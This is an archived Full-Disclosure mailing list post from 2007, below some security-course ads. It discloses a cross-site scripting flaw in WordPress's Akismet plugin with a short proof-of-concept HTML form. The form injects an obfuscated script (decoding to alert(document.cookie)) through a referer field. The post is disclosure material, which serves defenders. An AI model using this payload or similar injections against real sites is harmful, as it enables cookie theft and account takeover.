Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]

[Full-disclosure] Wordpress Akismet XSS flaw

Subject: [Full-disclosure] Wordpress Akismet XSS flaw
Date: Mon, 14 May 2007 23:16:22 +0200
-------------------- CODE -----------------------------
<html>
<body>
<form 
action="http://blog.url/wp-admin/plugins.php?page=akismet-key-config";
method="post" id="akismet-conf">

<input name="_wpnonce" value="'" type="text">
<input name="_wp_http_referer" 
value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
 
type="text"&gt;

&lt;input id="key" name="key" size="15" maxlength="12" value="1337"&gt;
&lt;input name="submit" value="Update options »" type="submit"&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
-------------------- EOC ------------------------------

http://mybeni.rootzilla.de/mybeNi/2007/wordpress_akismet_xss_security_flaw_beware_of_the_dog/

-- 
benjamin "beNi"
mybeNi websecurity - http://mybeNi.rootzilla.de/mybeNi

(coolest guy in da hood)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<Prev in Thread] Current Thread [Next in Thread>
  • [Full-disclosure] Wordpress Akismet XSS flaw, mybeni websecurity <=